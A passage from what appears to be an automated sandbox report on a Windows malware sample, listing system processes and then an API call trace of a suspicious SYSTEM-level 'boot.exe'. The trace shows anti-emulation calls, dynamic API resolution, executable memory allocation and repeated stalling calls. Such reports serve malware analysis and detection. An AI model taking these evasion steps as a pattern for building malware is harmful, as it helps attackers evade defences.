0x8c0 Thread: id = 51 os_tid = 0x908 Thread: id = 52 os_tid = 0xbfc Thread: id = 53 os_tid = 0x918 Thread: id = 54 os_tid = 0x8b0 Thread: id = 55 os_tid = 0x890 Thread: id = 56 os_tid = 0x974 Thread: id = 57 os_tid = 0x924 Thread: id = 58 os_tid = 0x478 Thread: id = 59 os_tid = 0x324 Thread: id = 60 os_tid = 0xbc Thread: id = 61 os_tid = 0xd0 Thread: id = 62 os_tid = 0x32c Thread: id = 63 os_tid = 0x18 Thread: id = 64 os_tid = 0x1c Thread: id = 65 os_tid = 0x580 Thread: id = 66 os_tid = 0x358 Thread: id = 67 os_tid = 0x7c Thread: id = 68 os_tid = 0x50 Thread: id = 69 os_tid = 0x60 Thread: id = 70 os_tid = 0xd4 Thread: id = 71 os_tid = 0x328 Thread: id = 72 os_tid = 0x340 Thread: id = 73 os_tid = 0xa0 Thread: id = 74 os_tid = 0x650 Thread: id = 75 os_tid = 0x468 Thread: id = 76 os_tid = 0x584 Thread: id = 77 os_tid = 0x0 Thread: id = 78 os_tid = 0x648 Thread: id = 79 os_tid = 0x54c Thread: id = 80 os_tid = 0x570 Thread: id = 81 os_tid = 0x20 Thread: id = 82 os_tid = 0x474 Thread: id = 83 os_tid = 0x7f8 Thread: id = 84 os_tid = 0xf8 Thread: id = 85 os_tid = 0x24 Thread: id = 86 os_tid = 0x6f8 Thread: id = 87 os_tid = 0x6e4 Thread: id = 88 os_tid = 0x6d4 Thread: id = 89 os_tid = 0x6c4 Thread: id = 90 os_tid = 0x6b4 Thread: id = 91 os_tid = 0x6ac Thread: id = 92 os_tid = 0x84 Thread: id = 93 os_tid = 0x650 Thread: id = 94 os_tid = 0x590 Thread: id = 95 os_tid = 0x94 Thread: id = 96 os_tid = 0x488 Thread: id = 97 os_tid = 0x470 Thread: id = 98 os_tid = 0x68 Thread: id = 99 os_tid = 0x138 Thread: id = 100 os_tid = 0x3d8 Thread: id = 101 os_tid = 0x9c Thread: id = 102 os_tid = 0x88 Thread: id = 103 os_tid = 0x8c Thread: id = 104 os_tid = 0x5c Thread: id = 105 os_tid = 0x78 Thread: id = 106 os_tid = 0x308 Thread: id = 107 os_tid = 0x28c Thread: id = 108 os_tid = 0x74 Thread: id = 109 os_tid = 0x98 Thread: id = 110 os_tid = 0x34 Thread: id = 111 os_tid = 0x100 Thread: id = 112 os_tid = 0x198 Thread: id = 113 os_tid = 0x80 Thread: id = 114 os_tid = 0x158 Thread: id = 115 os_tid = 0x154 Thread: id = 116 os_tid = 0x150 Thread: id = 117 os_tid = 0x120 Thread: id = 118 os_tid = 0x90 Thread: id = 119 os_tid = 0x4c Thread: id = 120 os_tid = 0x130 Thread: id = 121 os_tid = 0x128 Thread: id = 122 os_tid = 0x124 Thread: id = 123 os_tid = 0x11c Thread: id = 124 os_tid = 0x118 Thread: id = 125 os_tid = 0xc4 Thread: id = 126 os_tid = 0x44 Thread: id = 127 os_tid = 0x28 Thread: id = 128 os_tid = 0x40 Thread: id = 129 os_tid = 0x2c Thread: id = 130 os_tid = 0x48 Thread: id = 131 os_tid = 0x38 Thread: id = 132 os_tid = 0xb8 Thread: id = 133 os_tid = 0x3c Thread: id = 134 os_tid = 0xc0 Thread: id = 135 os_tid = 0xb0 Thread: id = 136 os_tid = 0x30 Thread: id = 137 os_tid = 0x8 Thread: id = 350 os_tid = 0x890 Thread: id = 354 os_tid = 0xa1c Process: id = "10" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 138 os_tid = 0x7fc Thread: id = 139 os_tid = 0x880 Thread: id = 140 os_tid = 0x9b8 Thread: id = 141 os_tid = 0x860 Thread: id = 142 os_tid = 0x4dc Thread: id = 143 os_tid = 0x378 Thread: id = 144 os_tid = 0x288 Thread: id = 145 os_tid = 0x234 Thread: id = 146 os_tid = 0x228 Thread: id = 147 os_tid = 0x21c Thread: id = 365 os_tid = 0x908 Thread: id = 366 os_tid = 0x8c0 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 148 os_tid = 0xbb8 Thread: id = 149 os_tid = 0xb68 Thread: id = 150 os_tid = 0x2a0 Thread: id = 151 os_tid = 0x29c Thread: id = 152 os_tid = 0x284 Thread: id = 153 os_tid = 0x280 Thread: id = 154 os_tid = 0x27c Thread: id = 155 os_tid = 0x278 Thread: id = 156 os_tid = 0x274 Thread: id = 157 os_tid = 0x268 Thread: id = 158 os_tid = 0x254 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 159 os_tid = 0x8e0 Thread: id = 160 os_tid = 0x2c0 Thread: id = 161 os_tid = 0x2bc Thread: id = 162 os_tid = 0x2b8 Thread: id = 163 os_tid = 0x2b4 Thread: id = 164 os_tid = 0x298 Thread: id = 342 os_tid = 0x6a0 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 165 os_tid = 0xb7c Thread: id = 166 os_tid = 0xb78 Thread: id = 167 os_tid = 0x670 Thread: id = 168 os_tid = 0xb58 Thread: id = 169 os_tid = 0x180 Thread: id = 170 os_tid = 0x6a4 Thread: id = 171 os_tid = 0x600 Thread: id = 172 os_tid = 0x5f8 Thread: id = 173 os_tid = 0x5f0 Thread: id = 174 os_tid = 0x5ec Thread: id = 175 os_tid = 0x5d0 Thread: id = 176 os_tid = 0x12c Thread: id = 177 os_tid = 0x170 Thread: id = 178 os_tid = 0x3c0 Thread: id = 179 os_tid = 0x3b8 Thread: id = 180 os_tid = 0x3a8 Thread: id = 181 os_tid = 0x2fc Thread: id = 182 os_tid = 0x2f8 Thread: id = 183 os_tid = 0x2d4 Thread: id = 184 os_tid = 0x2cc Thread: id = 353 os_tid = 0xbd0 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 185 os_tid = 0x308 Thread: id = 186 os_tid = 0x638 Thread: id = 187 os_tid = 0x554 Thread: id = 188 os_tid = 0x720 Thread: id = 189 os_tid = 0x668 Thread: id = 190 os_tid = 0x65c Thread: id = 191 os_tid = 0x144 Thread: id = 192 os_tid = 0x110 Thread: id = 193 os_tid = 0x3f0 Thread: id = 194 os_tid = 0x3ec Thread: id = 195 os_tid = 0x3e4 Thread: id = 196 os_tid = 0x3e0 Thread: id = 197 os_tid = 0x3d0 Thread: id = 198 os_tid = 0x3cc Thread: id = 199 os_tid = 0x398 Thread: id = 200 os_tid = 0x394 Thread: id = 201 os_tid = 0x384 Thread: id = 202 os_tid = 0x380 Thread: id = 203 os_tid = 0x350 Thread: id = 204 os_tid = 0x33c Thread: id = 357 os_tid = 0x528 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 205 os_tid = 0xbb0 Thread: id = 206 os_tid = 0xbc4 Thread: id = 207 os_tid = 0x9d8 Thread: id = 208 os_tid = 0x9e0 Thread: id = 209 os_tid = 0x9d4 Thread: id = 210 os_tid = 0x568 Thread: id = 211 os_tid = 0xb84 Thread: id = 212 os_tid = 0x270 Thread: id = 213 os_tid = 0x1c0 Thread: id = 214 os_tid = 0xbbc Thread: id = 215 os_tid = 0xbc0 Thread: id = 216 os_tid = 0xbcc Thread: id = 217 os_tid = 0x42c Thread: id = 218 os_tid = 0x1e4 Thread: id = 219 os_tid = 0x760 Thread: id = 220 os_tid = 0x6d0 Thread: id = 221 os_tid = 0x6bc Thread: id = 222 os_tid = 0x6b0 Thread: id = 223 os_tid = 0x69c Thread: id = 224 os_tid = 0x698 Thread: id = 225 os_tid = 0x684 Thread: id = 226 os_tid = 0x678 Thread: id = 227 os_tid = 0x4a8 Thread: id = 228 os_tid = 0x46c Thread: id = 229 os_tid = 0x44c Thread: id = 230 os_tid = 0x424 Thread: id = 231 os_tid = 0x41c Thread: id = 232 os_tid = 0x404 Thread: id = 233 os_tid = 0x14c Thread: id = 234 os_tid = 0x3fc Thread: id = 235 os_tid = 0x3f4 Thread: id = 236 os_tid = 0x3e8 Thread: id = 237 os_tid = 0x39c Thread: id = 238 os_tid = 0x390 Thread: id = 239 os_tid = 0x37c Thread: id = 240 os_tid = 0x374 Thread: id = 348 os_tid = 0x74c Thread: id = 351 os_tid = 0x224 Thread: id = 363 os_tid = 0x710 Thread: id = 364 os_tid = 0x3c4 Thread: id = 367 os_tid = 0x440 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 241 os_tid = 0x3a4 Thread: id = 242 os_tid = 0xb94 Thread: id = 243 os_tid = 0xb48 Thread: id = 244 os_tid = 0x418 Thread: id = 245 os_tid = 0x548 Thread: id = 246 os_tid = 0x750 Thread: id = 247 os_tid = 0x68c Thread: id = 248 os_tid = 0x680 Thread: id = 249 os_tid = 0x66c Thread: id = 250 os_tid = 0x5fc Thread: id = 251 os_tid = 0x188 Thread: id = 252 os_tid = 0x140 Thread: id = 253 os_tid = 0x128 Thread: id = 254 os_tid = 0x2b0 Thread: id = 255 os_tid = 0x218 Thread: id = 256 os_tid = 0x1cc Process: id = "17" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 257 os_tid = 0x83c Thread: id = 258 os_tid = 0x82c Thread: id = 259 os_tid = 0x80c Thread: id = 260 os_tid = 0x4e4 Thread: id = 261 os_tid = 0x704 Thread: id = 262 os_tid = 0x410 Thread: id = 263 os_tid = 0x5e0 Thread: id = 264 os_tid = 0x4b8 Thread: id = 265 os_tid = 0x4b4 Thread: id = 266 os_tid = 0x498 Thread: id = 267 os_tid = 0x494 Thread: id = 268 os_tid = 0x480 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 269 os_tid = 0xa10 Thread: id = 270 os_tid = 0xbec Thread: id = 271 os_tid = 0xb5c Thread: id = 272 os_tid = 0x744 Thread: id = 273 os_tid = 0x740 Thread: id = 274 os_tid = 0x73c Thread: id = 275 os_tid = 0x63c Thread: id = 276 os_tid = 0x62c Thread: id = 277 os_tid = 0x628 Thread: id = 278 os_tid = 0x624 Thread: id = 279 os_tid = 0x61c Thread: id = 280 os_tid = 0x610 Thread: id = 281 os_tid = 0x5e8 Thread: id = 282 os_tid = 0x5c8 Thread: id = 283 os_tid = 0x5c0 Thread: id = 284 os_tid = 0x5a0 Thread: id = 285 os_tid = 0x4f8 Thread: id = 286 os_tid = 0x4ec Thread: id = 287 os_tid = 0x4c4 Thread: id = 288 os_tid = 0x4c0 Process: id = "19" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 289 os_tid = 0x72c Thread: id = 290 os_tid = 0xba8 Thread: id = 291 os_tid = 0xb4c Thread: id = 292 os_tid = 0x794 Thread: id = 293 os_tid = 0x784 Thread: id = 294 os_tid = 0x77c Thread: id = 295 os_tid = 0x778 Thread: id = 296 os_tid = 0x770 Thread: id = 297 os_tid = 0x4f4 Thread: id = 298 os_tid = 0x4d8 Thread: id = 299 os_tid = 0x4cc Thread: id = 368 os_tid = 0x264 Process: id = "20" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5c303000" os_pid = "0x928" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005452d" [0xc0000007], "LOCAL" [0x7] Thread: id = 300 os_tid = 0xb9c Thread: id = 301 os_tid = 0x310 Thread: id = 302 os_tid = 0x314 Thread: id = 303 os_tid = 0x6c8 Thread: id = 304 os_tid = 0x9a8 Thread: id = 305 os_tid = 0x998 Thread: id = 306 os_tid = 0x968 Thread: id = 307 os_tid = 0x948 Thread: id = 308 os_tid = 0x524 Thread: id = 309 os_tid = 0x674 Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x48925000" os_pid = "0x85c" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0005af00" [0xc000000f], "LOCAL" [0x7] Thread: id = 310 os_tid = 0xbac Thread: id = 311 os_tid = 0x934 Thread: id = 312 os_tid = 0x8ac Thread: id = 313 os_tid = 0x89c Thread: id = 314 os_tid = 0x88c Thread: id = 315 os_tid = 0x86c Process: id = "22" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x46e30000" os_pid = "0x954" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005bb39" [0xc000000f], "LOCAL" [0x7] Thread: id = 316 os_tid = 0x34c Thread: id = 317 os_tid = 0x840 Thread: id = 318 os_tid = 0x9a4 Thread: id = 319 os_tid = 0x994 Thread: id = 320 os_tid = 0x984 Thread: id = 321 os_tid = 0x964 Process: id = "23" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x46136000" os_pid = "0x9c4" os_integrity_level = "0x4000" os_privileges = "0x209e0128" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005bcc1" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 322 os_tid = 0x9d0 Thread: id = 323 os_tid = 0xa3c Thread: id = 324 os_tid = 0xba4 Thread: id = 325 os_tid = 0xb8c Thread: id = 326 os_tid = 0xba0 Thread: id = 327 os_tid = 0xb90 Thread: id = 328 os_tid = 0x640 Thread: id = 329 os_tid = 0x8a0 Thread: id = 330 os_tid = 0xb88 Thread: id = 331 os_tid = 0xb70 Thread: id = 332 os_tid = 0x9cc Thread: id = 333 os_tid = 0x9c8 Process: id = "24" image_name = "boot.exe" filename = "c:\\windows\\syswow64\\boot.exe" page_root = "0x38e86000" os_pid = "0x7a4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\SysWOW64\\Boot.exe -s" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 334 os_tid = 0x2dc [0181.186] LoadCursorFromFileA (lpFileName="rtjuht8reht8wehrt98wh") returned 0x0 [0181.262] GetLastError () returned 0x2 [0181.263] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0181.263] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0181.263] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x4fe9e8 | out: phkResult=0x4fe9e8*=0x78) returned 0x0 [0181.264] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0181.264] RegQueryValueExA (in: hKey=0x78, lpValueName="", lpReserved=0x0, lpType=0x18ff70, lpData=0x18fea4, lpcbData=0x4fe6b0*=0xc8 | out: lpType=0x18ff70*=0x1, lpData="IEnumConnections", lpcbData=0x4fe6b0*=0x11) returned 0x0 [0181.264] LoadLibraryExA (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0181.264] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0181.264] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x2d0000 [0181.264] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.265] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0181.266] LoadIconA 